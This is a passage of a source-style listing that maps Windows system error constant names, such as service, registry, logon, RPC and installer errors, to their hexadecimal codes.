+ EA_ACCESS_DENIED = 0x03E2 + OPERATION_ABORTED = 0x03E3 + IO_INCOMPLETE = 0x03E4 + IO_PENDING = 0x03E5 + NOACCESS = 0x03E6 + SWAPERROR = 0x03E7 + STACK_OVERFLOW = 0x03E9 + INVALID_MESSAGE = 0x03EA + CAN_NOT_COMPLETE = 0x03EB + INVALID_FLAGS = 0x03EC + UNRECOGNIZED_VOLUME = 0x03ED + FILE_INVALID = 0x03EE + FULLSCREEN_MODE = 0x03EF + NO_TOKEN = 0x03F0 + BADDB = 0x03F1 + BADKEY = 0x03F2 + CANTOPEN = 0x03F3 + CANTREAD = 0x03F4 + CANTWRITE = 0x03F5 + REGISTRY_RECOVERED = 0x03F6 + REGISTRY_CORRUPT = 0x03F7 + REGISTRY_IO_FAILED = 0x03F8 + NOT_REGISTRY_FILE = 0x03F9 + KEY_DELETED = 0x03FA + NO_LOG_SPACE = 0x03FB + KEY_HAS_CHILDREN = 0x03FC + CHILD_MUST_BE_VOLATILE = 0x03FD + NOTIFY_ENUM_DIR = 0x03FE + DEPENDENT_SERVICES_RUNNING = 0x041B + INVALID_SERVICE_CONTROL = 0x041C + SERVICE_REQUEST_TIMEOUT = 0x041D + SERVICE_NO_THREAD = 0x041E + SERVICE_DATABASE_LOCKED = 0x041F + SERVICE_ALREADY_RUNNING = 0x0420 + INVALID_SERVICE_ACCOUNT = 0x0421 + SERVICE_DISABLED = 0x0422 + CIRCULAR_DEPENDENCY = 0x0423 + SERVICE_DOES_NOT_EXIST = 0x0424 + SERVICE_CANNOT_ACCEPT_CTRL = 0x0425 + SERVICE_NOT_ACTIVE = 0x0426 + FAILED_SERVICE_CONTROLLER_CONNECT = 0x0427 + EXCEPTION_IN_SERVICE = 0x0428 + DATABASE_DOES_NOT_EXIST = 0x0429 + SERVICE_SPECIFIC_ERROR = 0x042A + PROCESS_ABORTED = 0x042B + SERVICE_DEPENDENCY_FAIL = 0x042C + SERVICE_LOGON_FAILED = 0x042D + SERVICE_START_HANG = 0x042E + INVALID_SERVICE_LOCK = 0x042F + SERVICE_MARKED_FOR_DELETE = 0x0430 + SERVICE_EXISTS = 0x0431 + ALREADY_RUNNING_LKG = 0x0432 + SERVICE_DEPENDENCY_DELETED = 0x0433 + BOOT_ALREADY_ACCEPTED = 0x0434 + SERVICE_NEVER_STARTED = 0x0435 + DUPLICATE_SERVICE_NAME = 0x0436 + DIFFERENT_SERVICE_ACCOUNT = 0x0437 + CANNOT_DETECT_DRIVER_FAILURE = 0x0438 + CANNOT_DETECT_PROCESS_ABORT = 0x0439 + NO_RECOVERY_PROGRAM = 0x043A + SERVICE_NOT_IN_EXE = 0x043B + NOT_SAFEBOOT_SERVICE = 0x043C + END_OF_MEDIA = 0x044C + FILEMARK_DETECTED = 0x044D + BEGINNING_OF_MEDIA = 0x044E + SETMARK_DETECTED = 0x044F + NO_DATA_DETECTED = 0x0450 + 
PARTITION_FAILURE = 0x0451 + INVALID_BLOCK_LENGTH = 0x0452 + DEVICE_NOT_PARTITIONED = 0x0453 + UNABLE_TO_LOCK_MEDIA = 0x0454 + UNABLE_TO_UNLOAD_MEDIA = 0x0455 + MEDIA_CHANGED = 0x0456 + BUS_RESET = 0x0457 + NO_MEDIA_IN_DRIVE = 0x0458 + NO_UNICODE_TRANSLATION = 0x0459 + DLL_INIT_FAILED = 0x045A + SHUTDOWN_IN_PROGRESS = 0x045B + NO_SHUTDOWN_IN_PROGRESS = 0x045C + IO_DEVICE = 0x045D + SERIAL_NO_DEVICE = 0x045E + IRQ_BUSY = 0x045F + MORE_WRITES = 0x0460 + COUNTER_TIMEOUT = 0x0461 + FLOPPY_ID_MARK_NOT_FOUND = 0x0462 + FLOPPY_WRONG_CYLINDER = 0x0463 + FLOPPY_UNKNOWN_ERROR = 0x0464 + FLOPPY_BAD_REGISTERS = 0x0465 + DISK_RECALIBRATE_FAILED = 0x0466 + DISK_OPERATION_FAILED = 0x0467 + DISK_RESET_FAILED = 0x0468 + EOM_OVERFLOW = 0x0469 + NOT_ENOUGH_SERVER_MEMORY = 0x046A + POSSIBLE_DEADLOCK = 0x046B + MAPPED_ALIGNMENT = 0x046C + SET_POWER_STATE_VETOED = 0x0474 + SET_POWER_STATE_FAILED = 0x0475 + TOO_MANY_LINKS = 0x0476 + OLD_WIN_VERSION = 0x047E + APP_WRONG_OS = 0x047F + SINGLE_INSTANCE_APP = 0x0480 + RMODE_APP = 0x0481 + INVALID_DLL = 0x0482 + NO_ASSOCIATION = 0x0483 + DDE_FAIL = 0x0484 + DLL_NOT_FOUND = 0x0485 + NO_MORE_USER_HANDLES = 0x0486 + MESSAGE_SYNC_ONLY = 0x0487 + SOURCE_ELEMENT_EMPTY = 0x0488 + DESTINATION_ELEMENT_FULL = 0x0489 + ILLEGAL_ELEMENT_ADDRESS = 0x048A + MAGAZINE_NOT_PRESENT = 0x048B + DEVICE_REINITIALIZATION_NEEDED = 0x048C + DEVICE_REQUIRES_CLEANING = 0x048D + DEVICE_DOOR_OPEN = 0x048E + DEVICE_NOT_CONNECTED = 0x048F + NOT_FOUND = 0x0490 + NO_MATCH = 0x0491 + SET_NOT_FOUND = 0x0492 + POINT_NOT_FOUND = 0x0493 + NO_TRACKING_SERVICE = 0x0494 + NO_VOLUME_ID = 0x0495 + UNABLE_TO_REMOVE_REPLACED = 0x0497 + UNABLE_TO_MOVE_REPLACEMENT = 0x0498 + UNABLE_TO_MOVE_REPLACEMENT_2 = 0x0499 + JOURNAL_DELETE_IN_PROGRESS = 0x049A + JOURNAL_NOT_ACTIVE = 0x049B + POTENTIAL_FILE_FOUND = 0x049C + JOURNAL_ENTRY_DELETED = 0x049D + SHUTDOWN_IS_SCHEDULED = 0x04A6 + SHUTDOWN_USERS_LOGGED_ON = 0x04A7 + BAD_DEVICE = 0x04B0 + CONNECTION_UNAVAIL = 0x04B1 + DEVICE_ALREADY_REMEMBERED = 
0x04B2 + NO_NET_OR_BAD_PATH = 0x04B3 + BAD_PROVIDER = 0x04B4 + CANNOT_OPEN_PROFILE = 0x04B5 + BAD_PROFILE = 0x04B6 + NOT_CONTAINER = 0x04B7 + EXTENDED_ERROR = 0x04B8 + INVALID_GROUPNAME = 0x04B9 + INVALID_COMPUTERNAME = 0x04BA + INVALID_EVENTNAME = 0x04BB + INVALID_DOMAINNAME = 0x04BC + INVALID_SERVICENAME = 0x04BD + INVALID_NETNAME = 0x04BE + INVALID_SHARENAME = 0x04BF + INVALID_PASSWORDNAME = 0x04C0 + INVALID_MESSAGENAME = 0x04C1 + INVALID_MESSAGEDEST = 0x04C2 + SESSION_CREDENTIAL_CONFLICT = 0x04C3 + REMOTE_SESSION_LIMIT_EXCEEDED = 0x04C4 + DUP_DOMAINNAME = 0x04C5 + NO_NETWORK = 0x04C6 + CANCELLED = 0x04C7 + USER_MAPPED_FILE = 0x04C8 + CONNECTION_REFUSED = 0x04C9 + GRACEFUL_DISCONNECT = 0x04CA + ADDRESS_ALREADY_ASSOCIATED = 0x04CB + ADDRESS_NOT_ASSOCIATED = 0x04CC + CONNECTION_INVALID = 0x04CD + CONNECTION_ACTIVE = 0x04CE + NETWORK_UNREACHABLE = 0x04CF + HOST_UNREACHABLE = 0x04D0 + PROTOCOL_UNREACHABLE = 0x04D1 + PORT_UNREACHABLE = 0x04D2 + REQUEST_ABORTED = 0x04D3 + CONNECTION_ABORTED = 0x04D4 + RETRY = 0x04D5 + CONNECTION_COUNT_LIMIT = 0x04D6 + LOGIN_TIME_RESTRICTION = 0x04D7 + LOGIN_WKSTA_RESTRICTION = 0x04D8 + INCORRECT_ADDRESS = 0x04D9 + ALREADY_REGISTERED = 0x04DA + SERVICE_NOT_FOUND = 0x04DB + NOT_AUTHENTICATED = 0x04DC + NOT_LOGGED_ON = 0x04DD + CONTINUE = 0x04DE + ALREADY_INITIALIZED = 0x04DF + NO_MORE_DEVICES = 0x04E0 + NO_SUCH_SITE = 0x04E1 + DOMAIN_CONTROLLER_EXISTS = 0x04E2 + ONLY_IF_CONNECTED = 0x04E3 + OVERRIDE_NOCHANGES = 0x04E4 + BAD_USER_PROFILE = 0x04E5 + NOT_SUPPORTED_ON_SBS = 0x04E6 + SERVER_SHUTDOWN_IN_PROGRESS = 0x04E7 + HOST_DOWN = 0x04E8 + NON_ACCOUNT_SID = 0x04E9 + NON_DOMAIN_SID = 0x04EA + APPHELP_BLOCK = 0x04EB + ACCESS_DISABLED_BY_POLICY = 0x04EC + REG_NAT_CONSUMPTION = 0x04ED + CSCSHARE_OFFLINE = 0x04EE + PKINIT_FAILURE = 0x04EF + SMARTCARD_SUBSYSTEM_FAILURE = 0x04F0 + DOWNGRADE_DETECTED = 0x04F1 + MACHINE_LOCKED = 0x04F7 + CALLBACK_SUPPLIED_INVALID_DATA = 0x04F9 + SYNC_FOREGROUND_REFRESH_REQUIRED = 0x04FA + DRIVER_BLOCKED = 0x04FB + 
INVALID_IMPORT_OF_NON_DLL = 0x04FC + ACCESS_DISABLED_WEBBLADE = 0x04FD + ACCESS_DISABLED_WEBBLADE_TAMPER = 0x04FE + RECOVERY_FAILURE = 0x04FF + ALREADY_FIBER = 0x0500 + ALREADY_THREAD = 0x0501 + STACK_BUFFER_OVERRUN = 0x0502 + PARAMETER_QUOTA_EXCEEDED = 0x0503 + DEBUGGER_INACTIVE = 0x0504 + DELAY_LOAD_FAILED = 0x0505 + VDM_DISALLOWED = 0x0506 + UNIDENTIFIED_ERROR = 0x0507 + INVALID_CRUNTIME_PARAMETER = 0x0508 + BEYOND_VDL = 0x0509 + INCOMPATIBLE_SERVICE_SID_TYPE = 0x050A + DRIVER_PROCESS_TERMINATED = 0x050B + IMPLEMENTATION_LIMIT = 0x050C + PROCESS_IS_PROTECTED = 0x050D + SERVICE_NOTIFY_CLIENT_LAGGING = 0x050E + DISK_QUOTA_EXCEEDED = 0x050F + CONTENT_BLOCKED = 0x0510 + INCOMPATIBLE_SERVICE_PRIVILEGE = 0x0511 + INVALID_LABEL = 0x0513 + NOT_ALL_ASSIGNED = 0x0514 + SOME_NOT_MAPPED = 0x0515 + NO_QUOTAS_FOR_ACCOUNT = 0x0516 + LOCAL_USER_SESSION_KEY = 0x0517 + NULL_LM_PASSWORD = 0x0518 + UNKNOWN_REVISION = 0x0519 + REVISION_MISMATCH = 0x051A + INVALID_OWNER = 0x051B + INVALID_PRIMARY_GROUP = 0x051C + NO_IMPERSONATION_TOKEN = 0x051D + CANT_DISABLE_MANDATORY = 0x051E + NO_LOGON_SERVERS = 0x051F + NO_SUCH_LOGON_SESSION = 0x0520 + NO_SUCH_PRIVILEGE = 0x0521 + PRIVILEGE_NOT_HELD = 0x0522 + INVALID_ACCOUNT_NAME = 0x0523 + USER_EXISTS = 0x0524 + NO_SUCH_USER = 0x0525 + GROUP_EXISTS = 0x0526 + NO_SUCH_GROUP = 0x0527 + MEMBER_IN_GROUP = 0x0528 + MEMBER_NOT_IN_GROUP = 0x0529 + LAST_ADMIN = 0x052A + WRONG_PASSWORD = 0x052B + ILL_FORMED_PASSWORD = 0x052C + PASSWORD_RESTRICTION = 0x052D + LOGON_FAILURE = 0x052E + ACCOUNT_RESTRICTION = 0x052F + INVALID_LOGON_HOURS = 0x0530 + INVALID_WORKSTATION = 0x0531 + PASSWORD_EXPIRED = 0x0532 + ACCOUNT_DISABLED = 0x0533 + NONE_MAPPED = 0x0534 + TOO_MANY_LUIDS_REQUESTED = 0x0535 + LUIDS_EXHAUSTED = 0x0536 + INVALID_SUB_AUTHORITY = 0x0537 + INVALID_ACL = 0x0538 + INVALID_SID = 0x0539 + INVALID_SECURITY_DESCR = 0x053A + BAD_INHERITANCE_ACL = 0x053C + SERVER_DISABLED = 0x053D + SERVER_NOT_DISABLED = 0x053E + INVALID_ID_AUTHORITY = 0x053F + 
ALLOTTED_SPACE_EXCEEDED = 0x0540 + INVALID_GROUP_ATTRIBUTES = 0x0541 + BAD_IMPERSONATION_LEVEL = 0x0542 + CANT_OPEN_ANONYMOUS = 0x0543 + BAD_VALIDATION_CLASS = 0x0544 + BAD_TOKEN_TYPE = 0x0545 + NO_SECURITY_ON_OBJECT = 0x0546 + CANT_ACCESS_DOMAIN_INFO = 0x0547 + INVALID_SERVER_STATE = 0x0548 + INVALID_DOMAIN_STATE = 0x0549 + INVALID_DOMAIN_ROLE = 0x054A + NO_SUCH_DOMAIN = 0x054B + DOMAIN_EXISTS = 0x054C + DOMAIN_LIMIT_EXCEEDED = 0x054D + INTERNAL_DB_CORRUPTION = 0x054E + INTERNAL_ERROR = 0x054F + GENERIC_NOT_MAPPED = 0x0550 + BAD_DESCRIPTOR_FORMAT = 0x0551 + NOT_LOGON_PROCESS = 0x0552 + LOGON_SESSION_EXISTS = 0x0553 + NO_SUCH_PACKAGE = 0x0554 + BAD_LOGON_SESSION_STATE = 0x0555 + LOGON_SESSION_COLLISION = 0x0556 + INVALID_LOGON_TYPE = 0x0557 + CANNOT_IMPERSONATE = 0x0558 + RXACT_INVALID_STATE = 0x0559 + RXACT_COMMIT_FAILURE = 0x055A + SPECIAL_ACCOUNT = 0x055B + SPECIAL_GROUP = 0x055C + SPECIAL_USER = 0x055D + MEMBERS_PRIMARY_GROUP = 0x055E + TOKEN_ALREADY_IN_USE = 0x055F + NO_SUCH_ALIAS = 0x0560 + MEMBER_NOT_IN_ALIAS = 0x0561 + MEMBER_IN_ALIAS = 0x0562 + ALIAS_EXISTS = 0x0563 + LOGON_NOT_GRANTED = 0x0564 + TOO_MANY_SECRETS = 0x0565 + SECRET_TOO_LONG = 0x0566 + INTERNAL_DB_ERROR = 0x0567 + TOO_MANY_CONTEXT_IDS = 0x0568 + LOGON_TYPE_NOT_GRANTED = 0x0569 + NT_CROSS_ENCRYPTION_REQUIRED = 0x056A + NO_SUCH_MEMBER = 0x056B + INVALID_MEMBER = 0x056C + TOO_MANY_SIDS = 0x056D + LM_CROSS_ENCRYPTION_REQUIRED = 0x056E + NO_INHERITANCE = 0x056F + FILE_CORRUPT = 0x0570 + DISK_CORRUPT = 0x0571 + NO_USER_SESSION_KEY = 0x0572 + LICENSE_QUOTA_EXCEEDED = 0x0573 + WRONG_TARGET_NAME = 0x0574 + MUTUAL_AUTH_FAILED = 0x0575 + TIME_SKEW = 0x0576 + CURRENT_DOMAIN_NOT_ALLOWED = 0x0577 + INVALID_WINDOW_HANDLE = 0x0578 + INVALID_MENU_HANDLE = 0x0579 + INVALID_CURSOR_HANDLE = 0x057A + INVALID_ACCEL_HANDLE = 0x057B + INVALID_HOOK_HANDLE = 0x057C + INVALID_DWP_HANDLE = 0x057D + TLW_WITH_WSCHILD = 0x057E + CANNOT_FIND_WND_CLASS = 0x057F + WINDOW_OF_OTHER_THREAD = 0x0580 + HOTKEY_ALREADY_REGISTERED = 
0x0581 + CLASS_ALREADY_EXISTS = 0x0582 + CLASS_DOES_NOT_EXIST = 0x0583 + CLASS_HAS_WINDOWS = 0x0584 + INVALID_INDEX = 0x0585 + INVALID_ICON_HANDLE = 0x0586 + PRIVATE_DIALOG_INDEX = 0x0587 + LISTBOX_ID_NOT_FOUND = 0x0588 + NO_WILDCARD_CHARACTERS = 0x0589 + CLIPBOARD_NOT_OPEN = 0x058A + HOTKEY_NOT_REGISTERED = 0x058B + WINDOW_NOT_DIALOG = 0x058C + CONTROL_ID_NOT_FOUND = 0x058D + INVALID_COMBOBOX_MESSAGE = 0x058E + WINDOW_NOT_COMBOBOX = 0x058F + INVALID_EDIT_HEIGHT = 0x0590 + DC_NOT_FOUND = 0x0591 + INVALID_HOOK_FILTER = 0x0592 + INVALID_FILTER_PROC = 0x0593 + HOOK_NEEDS_HMOD = 0x0594 + GLOBAL_ONLY_HOOK = 0x0595 + JOURNAL_HOOK_SET = 0x0596 + HOOK_NOT_INSTALLED = 0x0597 + INVALID_LB_MESSAGE = 0x0598 + SETCOUNT_ON_BAD_LB = 0x0599 + LB_WITHOUT_TABSTOPS = 0x059A + DESTROY_OBJECT_OF_OTHER_THREAD = 0x059B + CHILD_WINDOW_MENU = 0x059C + NO_SYSTEM_MENU = 0x059D + INVALID_MSGBOX_STYLE = 0x059E + INVALID_SPI_VALUE = 0x059F + SCREEN_ALREADY_LOCKED = 0x05A0 + HWNDS_HAVE_DIFF_PARENT = 0x05A1 + NOT_CHILD_WINDOW = 0x05A2 + INVALID_GW_COMMAND = 0x05A3 + INVALID_THREAD_ID = 0x05A4 + NON_MDICHILD_WINDOW = 0x05A5 + POPUP_ALREADY_ACTIVE = 0x05A6 + NO_SCROLLBARS = 0x05A7 + INVALID_SCROLLBAR_RANGE = 0x05A8 + INVALID_SHOWWIN_COMMAND = 0x05A9 + NO_SYSTEM_RESOURCES = 0x05AA + NONPAGED_SYSTEM_RESOURCES = 0x05AB + PAGED_SYSTEM_RESOURCES = 0x05AC + WORKING_SET_QUOTA = 0x05AD + PAGEFILE_QUOTA = 0x05AE + COMMITMENT_LIMIT = 0x05AF + MENU_ITEM_NOT_FOUND = 0x05B0 + INVALID_KEYBOARD_HANDLE = 0x05B1 + HOOK_TYPE_NOT_ALLOWED = 0x05B2 + REQUIRES_INTERACTIVE_WINDOWSTATION = 0x05B3 + TIMEOUT = 0x05B4 + INVALID_MONITOR_HANDLE = 0x05B5 + INCORRECT_SIZE = 0x05B6 + SYMLINK_CLASS_DISABLED = 0x05B7 + SYMLINK_NOT_SUPPORTED = 0x05B8 + XML_PARSE_ERROR = 0x05B9 + XMLDSIG_ERROR = 0x05BA + RESTART_APPLICATION = 0x05BB + WRONG_COMPARTMENT = 0x05BC + AUTHIP_FAILURE = 0x05BD + NO_NVRAM_RESOURCES = 0x05BE + EVENTLOG_FILE_CORRUPT = 0x05DC + EVENTLOG_CANT_START = 0x05DD + LOG_FILE_FULL = 0x05DE + EVENTLOG_FILE_CHANGED = 
0x05DF + INVALID_TASK_NAME = 0x060E + INVALID_TASK_INDEX = 0x060F + THREAD_ALREADY_IN_TASK = 0x0610 + INSTALL_SERVICE_FAILURE = 0x0641 + INSTALL_USEREXIT = 0x0642 + INSTALL_FAILURE = 0x0643 + INSTALL_SUSPEND = 0x0644 + UNKNOWN_PRODUCT = 0x0645 + UNKNOWN_FEATURE = 0x0646 + UNKNOWN_COMPONENT = 0x0647 + UNKNOWN_PROPERTY = 0x0648 + INVALID_HANDLE_STATE = 0x0649 + BAD_CONFIGURATION = 0x064A + INDEX_ABSENT = 0x064B + INSTALL_SOURCE_ABSENT = 0x064C + INSTALL_PACKAGE_VERSION = 0x064D + PRODUCT_UNINSTALLED = 0x064E + BAD_QUERY_SYNTAX = 0x064F + INVALID_FIELD = 0x0650 + DEVICE_REMOVED = 0x0651 + INSTALL_ALREADY_RUNNING = 0x0652 + INSTALL_PACKAGE_OPEN_FAILED = 0x0653 + INSTALL_PACKAGE_INVALID = 0x0654 + INSTALL_UI_FAILURE = 0x0655 + INSTALL_LOG_FAILURE = 0x0656 + INSTALL_LANGUAGE_UNSUPPORTED = 0x0657 + INSTALL_TRANSFORM_FAILURE = 0x0658 + INSTALL_PACKAGE_REJECTED = 0x0659 + FUNCTION_NOT_CALLED = 0x065A + FUNCTION_FAILED = 0x065B + INVALID_TABLE = 0x065C + DATATYPE_MISMATCH = 0x065D + UNSUPPORTED_TYPE = 0x065E + CREATE_FAILED = 0x065F + INSTALL_TEMP_UNWRITABLE = 0x0660 + INSTALL_PLATFORM_UNSUPPORTED = 0x0661 + INSTALL_NOTUSED = 0x0662 + PATCH_PACKAGE_OPEN_FAILED = 0x0663 + PATCH_PACKAGE_INVALID = 0x0664 + PATCH_PACKAGE_UNSUPPORTED = 0x0665 + PRODUCT_VERSION = 0x0666 + INVALID_COMMAND_LINE = 0x0667 + INSTALL_REMOTE_DISALLOWED = 0x0668 + SUCCESS_REBOOT_INITIATED = 0x0669 + PATCH_TARGET_NOT_FOUND = 0x066A + PATCH_PACKAGE_REJECTED = 0x066B + INSTALL_TRANSFORM_REJECTED = 0x066C + INSTALL_REMOTE_PROHIBITED = 0x066D + PATCH_REMOVAL_UNSUPPORTED = 0x066E + UNKNOWN_PATCH = 0x066F + PATCH_NO_SEQUENCE = 0x0670 + PATCH_REMOVAL_DISALLOWED = 0x0671 + INVALID_PATCH_XML = 0x0672 + PATCH_MANAGED_ADVERTISED_PRODUCT = 0x0673 + INSTALL_SERVICE_SAFEBOOT = 0x0674 + FAIL_FAST_EXCEPTION = 0x0675 + RPC_S_INVALID_STRING_BINDING = 0x06A4 + RPC_S_WRONG_KIND_OF_BINDING = 0x06A5 + RPC_S_INVALID_BINDING = 0x06A6 + RPC_S_PROTSEQ_NOT_SUPPORTED = 0x06A7 + RPC_S_INVALID_RPC_PROTSEQ = 0x06A8 + 
RPC_S_INVALID_STRING_UUID = 0x06A9 + RPC_S_INVALID_ENDPOINT_FORMAT = 0x06AA + RPC_S_INVALID_NET_ADDR = 0x06AB + RPC_S_NO_ENDPOINT_FOUND = 0x06AC + RPC_S_INVALID_TIMEOUT = 0x06AD + RPC_S_OBJECT_NOT_FOUND = 0x06AE + RPC_S_ALREADY_REGISTERED = 0x06AF + RPC_S_TYPE_ALREADY_REGISTERED = 0x06B0 + RPC_S_ALREADY_LISTENING = 0x06B1 + RPC_S_NO_PROTSEQS_REGISTERED = 0x06B2 + RPC_S_NOT_LISTENING = 0x06B3 + RPC_S_UNKNOWN_MGR_TYPE = 0x06B4 + RPC_S_UNKNOWN_IF = 0x06B5 + RPC_S_NO_BINDINGS = 0x06B6 + RPC_S_NO_PROTSEQS = 0x06B7 + RPC_S_CANT_CREATE_ENDPOINT = 0x06B8 + RPC_S_OUT_OF_RESOURCES = 0x06B9 + RPC_S_SERVER_UNAVAILABLE = 0x06BA + RPC_S_SERVER_TOO_BUSY = 0x06BB + RPC_S_INVALID_NETWORK_OPTIONS = 0x06BC + RPC_S_NO_CALL_ACTIVE = 0x06BD + RPC_S_CALL_FAILED = 0x06BE + RPC_S_CALL_FAILED_DNE = 0x06BF + RPC_S_PROTOCOL_ERROR = 0x06C0 + RPC_S_PROXY_ACCESS_DENIED = 0x06C1 + RPC_S_UNSUPPORTED_TRANS_SYN = 0x06C2 + RPC_S_UNSUPPORTED_TYPE = 0x06C4 + RPC_S_INVALID_TAG = 0x06C5 + RPC_S_INVALID_BOUND = 0x06C6 + RPC_S_NO_ENTRY_NAME = 0x06C7 + RPC_S_INVALID_NAME_SYNTAX = 0x06C8 + RPC_S_UNSUPPORTED_NAME_SYNTAX = 0x06C9 + RPC_S_UUID_NO_ADDRESS = 0x06CB + RPC_S_DUPLICATE_ENDPOINT = 0x06CC + RPC_S_UNKNOWN_AUTHN_TYPE = 0x06CD + RPC_S_MAX_CALLS_TOO_SMALL = 0x06CE + RPC_S_STRING_TOO_LONG = 0x06CF + RPC_S_PROTSEQ_NOT_FOUND = 0x06D0 + RPC_S_PROCNUM_OUT_OF_RANGE = 0x06D1 + RPC_S_BINDING_HAS_NO_AUTH = 0x06D2 + RPC_S_UNKNOWN_AUTHN_SERVICE = 0x06D3 + RPC_S_UNKNOWN_AUTHN_LEVEL = 0x06D4 + RPC_S_INVALID_AUTH_IDENTITY = 0x06D5 + RPC_S_UNKNOWN_AUTHZ_SERVICE = 0x06D6 + EPT_S_INVALID_ENTRY = 0x06D7 + EPT_S_CANT_PERFORM_OP = 0x06D8 + EPT_S_NOT_REGISTERED = 0x06D9 + RPC_S_NOTHING_TO_EXPORT = 0x06DA + RPC_S_INCOMPLETE_NAME = 0x06DB + RPC_S_INVALID_VERS_OPTION = 0x06DC + RPC_S_NO_MORE_MEMBERS = 0x06DD + RPC_S_NOT_ALL_OBJS_UNEXPORTED = 0x06DE + RPC_S_INTERFACE_NOT_FOUND = 0x06DF + RPC_S_ENTRY_ALREADY_EXISTS = 0x06E0 + RPC_S_ENTRY_NOT_FOUND = 0x06E1 + RPC_S_NAME_SERVICE_UNAVAILABLE = 0x06E2 + RPC_S_INVALID_NAF_ID = 0x06E3 + 
RPC_S_CANNOT_SUPPORT = 0x06E4 + RPC_S_NO_CONTEXT_AVAILABLE = 0x06E5 + RPC_S_INTERNAL_ERROR = 0x06E6 + RPC_S_ZERO_DIVIDE = 0x06E7 + RPC_S_ADDRESS_ERROR = 0x06E8 + RPC_S_FP_DIV_ZERO = 0x06E9 + RPC_S_FP_UNDERFLOW = 0x06EA + RPC_S_FP_OVERFLOW = 0x06EB + RPC_X_NO_MORE_ENTRIES = 0x06EC + RPC_X_SS_CHAR_TRANS_OPEN_FAIL = 0x06ED + RPC_X_SS_CHAR_TRANS_SHORT_FILE = 0x06EE + RPC_X_SS_IN_NULL_CONTEXT = 0x06EF + RPC_X_SS_CONTEXT_DAMAGED = 0x06F1 + RPC_X_SS_HANDLES_MISMATCH = 0x06F2 + RPC_X_SS_CANNOT_GET_CALL_HANDLE = 0x06F3 + RPC_X_NULL_REF_POINTER = 0x06F4 + RPC_X_ENUM_VALUE_OUT_OF_RANGE = 0x06F5 + RPC_X_BYTE_COUNT_TOO_SMALL = 0x06F6 + RPC_X_BAD_STUB_DATA = 0x06F7 + INVALID_USER_BUFFER = 0x06F8 + UNRECOGNIZED_MEDIA = 0x06F9 + NO_TRUST_LSA_SECRET = 0x06FA + NO_TRUST_SAM_ACCOUNT = 0x06FB + TRUSTED_DOMAIN_FAILURE = 0x06FC + TRUSTED_RELATIONSHIP_FAILURE = 0x06FD + TRUST_FAILURE = 0x06FE + RPC_S_CALL_IN_PROGRESS = 0x06FF + NETLOGON_NOT_STARTED = 0x0700 + ACCOUNT_EXPIRED = 0x0701 + REDIRECTOR_HAS_OPEN_HANDLES = 0x0702 + PRINTER_DRIVER_ALREADY_INSTALLED = 0x0703 + UNKNOWN_PORT = 0x0704 + UNKNOWN_PRINTER_DRIVER = 0x0705 + UNKNOWN_PRINTPROCESSOR = 0x0706 + INVALID_SEPARATOR_FILE = 0x0707 + INVALID_PRIORITY = 0x0708 + INVALID_PRINTER_NAME = 0x0709 + PRINTER_ALREADY_EXISTS = 0x070A + INVALID_PRINTER_COMMAND = 0x070B + INVALID_DATATYPE = 0x070C + INVALID_ENVIRONMENT = 0x070D + RPC_S_NO_MORE_BINDINGS = 0x070E + NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x070F + NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x0710 + NOLOGON_SERVER_TRUST_ACCOUNT = 0x0711 + DOMAIN_TRUST_INCONSISTENT = 0x0712 + SERVER_HAS_OPEN_HANDLES = 0x0713 + RESOURCE_DATA_NOT_FOUND = 0x0714 + RESOURCE_TYPE_NOT_FOUND = 0x0715 + RESOURCE_NAME_NOT_FOUND = 0x0716 + RESOURCE_LANG_NOT_FOUND = 0x0717 + NOT_ENOUGH_QUOTA = 0x0718 + RPC_S_NO_INTERFACES = 0x0719 + RPC_S_CALL_CANCELLED = 0x071A + RPC_S_BINDING_INCOMPLETE = 0x071B + RPC_S_COMM_FAILURE = 0x071C + RPC_S_UNSUPPORTED_AUTHN_LEVEL = 0x071D + RPC_S_NO_PRINC_NAME = 0x071E + RPC_S_NOT_RPC_ERROR 
= 0x071F + RPC_S_UUID_LOCAL_ONLY = 0x0720 + RPC_S_SEC_PKG_ERROR = 0x0721 + RPC_S_NOT_CANCELLED = 0x0722 + RPC_X_INVALID_ES_ACTION = 0x0723 + RPC_X_WRONG_ES_VERSION = 0x0724 + RPC_X_WRONG_STUB_VERSION = 0x0725 + RPC_X_INVALID_PIPE_OBJECT = 0x0726 + RPC_X_WRONG_PIPE_ORDER = 0x0727 + RPC_X_WRONG_PIPE_VERSION = 0x0728 + RPC_S_COOKIE_AUTH_FAILED = 0x0729 + RPC_S_GROUP_MEMBER_NOT_FOUND = 0x076A + EPT_S_CANT_CREATE = 0x076B + RPC_S_INVALID_OBJECT = 0x076C + INVALID_TIME = 0x076D + INVALID_FORM_NAME = 0x076E + INVALID_FORM_SIZE = 0x076F + ALREADY_WAITING = 0x0770 + PRINTER_DELETED = 0x0771 + INVALID_PRINTER_STATE = 0x0772 + PASSWORD_MUST_CHANGE = 0x0773 + DOMAIN_CONTROLLER_NOT_FOUND = 0x0774 + ACCOUNT_LOCKED_OUT = 0x0775 + OR_INVALID_OXID = 0x0776 + OR_INVALID_OID = 0x0777 + OR_INVALID_SET = 0x0778 + RPC_S_SEND_INCOMPLETE = 0x0779 + RPC_S_INVALID_ASYNC_HANDLE = 0x077A + RPC_S_INVALID_ASYNC_CALL = 0x077B + RPC_X_PIPE_CLOSED = 0x077C + RPC_X_PIPE_DISCIPLINE_ERROR = 0x077D + RPC_X_PIPE_EMPTY = 0x077E + NO_SITENAME = 0x077F + CANT_ACCESS_FILE = 0x0780 + CANT_RESOLVE_FILENAME = 0x0781 + RPC_S_ENTRY_TYPE_MISMATCH = 0x0782 + RPC_S_NOT_ALL_OBJS_EXPORTED = 0x0783 + RPC_S_INTERFACE_NOT_EXPORTED = 0x0784 + RPC_S_PROFILE_NOT_ADDED = 0x0785 + RPC_S_PRF_ELT_NOT_ADDED = 0x0786 + RPC_S_PRF_ELT_NOT_REMOVED = 0x0787 + RPC_S_GRP_ELT_NOT_ADDED = 0x0788 + RPC_S_GRP_ELT_NOT_REMOVED = 0x0789 + KM_DRIVER_BLOCKED = 0x078A + CONTEXT_EXPIRED = 0x078B + PER_USER_TRUST_QUOTA_EXCEEDED = 0x078C + ALL_USER_TRUST_QUOTA_EXCEEDED = 0x078D + USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x078E + AUTHENTICATION_FIREWALL_FAILED = 0x078F + REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x0790 + NTLM_BLOCKED = 0x0791 + INVALID_PIXEL_FORMAT = 0x07D0 + BAD_DRIVER = 0x07D1 + INVALID_WINDOW_STYLE = 0x07D2 